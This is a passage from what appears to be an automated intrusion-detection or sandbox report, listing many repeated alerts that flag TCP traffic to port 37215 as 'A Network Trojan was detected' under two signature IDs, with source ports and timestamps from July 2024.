                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.116330
                  SID:2829579
                  Source Port:58750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2829579
                  Source Port:55874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.352222
                  SID:2829579
                  Source Port:58526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2835222
                  Source Port:57526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2829579
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399838
                  SID:2829579
                  Source Port:51876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896648
                  SID:2829579
                  Source Port:46676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2835222
                  Source Port:52404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353894
                  SID:2835222
                  Source Port:47282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595004
                  SID:2829579
                  Source Port:55038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.461446
                  SID:2835222
                  Source Port:43962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2835222
                  Source Port:50700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846154
                  SID:2829579
                  Source Port:44526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541927
                  SID:2835222
                  Source Port:44330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961699
                  SID:2835222
                  Source Port:35590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.494630
                  SID:2829579
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.096312
                  SID:2829579
                  Source Port:38452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2829579
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721349
                  SID:2835222
                  Source Port:44296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2829579
                  Source Port:46202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429801
                  SID:2829579
                  Source Port:35004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2835222
                  Source Port:41218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2829579
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.210763
                  SID:2835222
                  Source Port:57624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2835222
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.523580
                  SID:2835222
                  Source Port:44636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093189
                  SID:2829579
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.903718
                  SID:2835222
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327774
                  SID:2829579
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2835222
                  Source Port:47062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999285
                  SID:2829579
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.559243
                  SID:2835222
                  Source Port:46058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2829579
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202394
                  SID:2835222
                  Source Port:57808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437188
                  SID:2829579
                  Source Port:46246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.928816
                  SID:2835222
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2835222
                  Source Port:44352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894424
                  SID:2829579
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2835222
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2835222
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2835222
                  Source Port:35256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974757
                  SID:2829579
                  Source Port:49532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.600211
                  SID:2835222
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259693
                  SID:2829579
                  Source Port:55010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942170
                  SID:2835222
                  Source Port:48838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2835222
                  Source Port:60024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2835222
                  Source Port:53782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397388
                  SID:2829579
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.248893
                  SID:2835222
                  Source Port:56852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2835222
                  Source Port:39216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033408
                  SID:2829579
                  Source Port:57782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526946
                  SID:2829579
                  Source Port:35638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593933
                  SID:2829579
                  Source Port:59676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.247589
                  SID:2835222
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549884
                  SID:2835222
                  Source Port:58876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596849
                  SID:2829579
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2829579
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.791471
                  SID:2835222
                  Source Port:34690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2829579
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.553944
                  SID:2835222
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2835222
                  Source Port:34894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2835222
                  Source Port:56388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.817300
                  SID:2835222
                  Source Port:43268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2829579
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2835222
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.846207
                  SID:2829579
                  Source Port:59538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.364208
                  SID:2835222
                  Source Port:34028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759020
                  SID:2829579
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188869
                  SID:2835222
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.516990
                  SID:2835222
                  Source Port:48036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.747131
                  SID:2829579
                  Source Port:51412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2829579
                  Source Port:54060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060125
                  SID:2829579
                  Source Port:45202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.886459
                  SID:2829579
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2835222
                  Source Port:48000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2829579
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2829579
                  Source Port:58312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.606655
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.621146
                  SID:2835222
                  Source Port:39304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.872945
                  SID:2829579
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2829579
                  Source Port:47064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.337044
                  SID:2829579
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2835222
                  Source Port:40942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853390
                  SID:2829579
                  Source Port:46214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:38306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239494
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950900
                  SID:2835222
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.157015
                  SID:2829579
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.055054
                  SID:2829579
                  Source Port:46562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216208
                  SID:2829579
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819376
                  SID:2835222
                  Source Port:37344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590105
                  SID:2835222
                  Source Port:58978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.922659
                  SID:2829579
                  Source Port:40616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:50002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2835222
                  Source Port:42212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525787
                  SID:2829579
                  Source Port:58650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.623300
                  SID:2835222
                  Source Port:44582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806375
                  SID:2835222
                  Source Port:44676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953100
                  SID:2829579
                  Source Port:44884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451425
                  SID:2835222
                  Source Port:48118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073634
                  SID:2835222
                  Source Port:50968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.931726
                  SID:2829579
                  Source Port:58116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2829579
                  Source Port:42098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134234
                  SID:2835222
                  Source Port:34974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765325
                  SID:2835222
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2829579
                  Source Port:44190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611798
                  SID:2835222
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.496138
                  SID:2835222
                  Source Port:39982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.681794
                  SID:2829579
                  Source Port:49402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2829579
                  Source Port:46956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.851109
                  SID:2829579
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.451882
                  SID:2829579
                  Source Port:45348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909293
                  SID:2829579
                  Source Port:47712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.217078
                  SID:2829579
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004121
                  SID:2835222
                  Source Port:48308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138827
                  SID:2829579
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.013540
                  SID:2829579
                  Source Port:51132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.343716
                  SID:2829579
                  Source Port:49074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354111
                  SID:2835222
                  Source Port:60002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2835222
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.349048
                  SID:2829579
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286567
                  SID:2829579
                  Source Port:48114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2835222
                  Source Port:48386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2829579
                  Source Port:51994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.596679
                  SID:2835222
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.453874
                  SID:2829579
                  Source Port:53662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350024
                  SID:2835222
                  Source Port:42860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2835222
                  Source Port:35262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2829579
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778189
                  SID:2829579
                  Source Port:37492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2829579
                  Source Port:54342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2835222
                  Source Port:37714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637421
                  SID:2829579
                  Source Port:38246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821259
                  SID:2829579
                  Source Port:53592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.232329
                  SID:2829579
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.330913
                  SID:2835222
                  Source Port:48896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196135
                  SID:2835222
                  Source Port:41008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2835222
                  Source Port:52760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778031
                  SID:2835222
                  Source Port:52812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2829579
                  Source Port:37442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.960624
                  SID:2829579
                  Source Port:34746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126835
                  SID:2835222
                  Source Port:46072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2829579
                  Source Port:46276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238192
                  SID:2829579
                  Source Port:35672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2829579
                  Source Port:57428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.832527
                  SID:2829579
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.843414
                  SID:2829579
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.889916
                  SID:2829579
                  Source Port:56972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165104
                  SID:2835222
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2829579
                  Source Port:43280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.246495
                  SID:2829579
                  Source Port:52282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2829579
                  Source Port:58120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:30.989109
                  SID:2835222
                  Source Port:47824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2829579
                  Source Port:48100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126836
                  SID:2835222
                  Source Port:39314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.631405
                  SID:2829579
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:58080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.457163
                  SID:2835222
                  Source Port:37358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2835222
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2835222
                  Source Port:37194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.709272
                  SID:2829579
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2835222
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.001475
                  SID:2829579
                  Source Port:36254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317651
                  SID:2829579
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2829579
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.425503
                  SID:2835222
                  Source Port:51556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761557
                  SID:2835222
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.521213
                  SID:2829579
                  Source Port:56008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2829579
                  Source Port:32892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.672613
                  SID:2835222
                  Source Port:32914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:56596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339308
                  SID:2835222
                  Source Port:43684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.860013
                  SID:2835222
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981355
                  SID:2829579
                  Source Port:57200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2829579
                  Source Port:50168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461337
                  SID:2829579
                  Source Port:52334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.550760
                  SID:2835222
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2835222
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2829579
                  Source Port:44598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2829579
                  Source Port:34288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252785
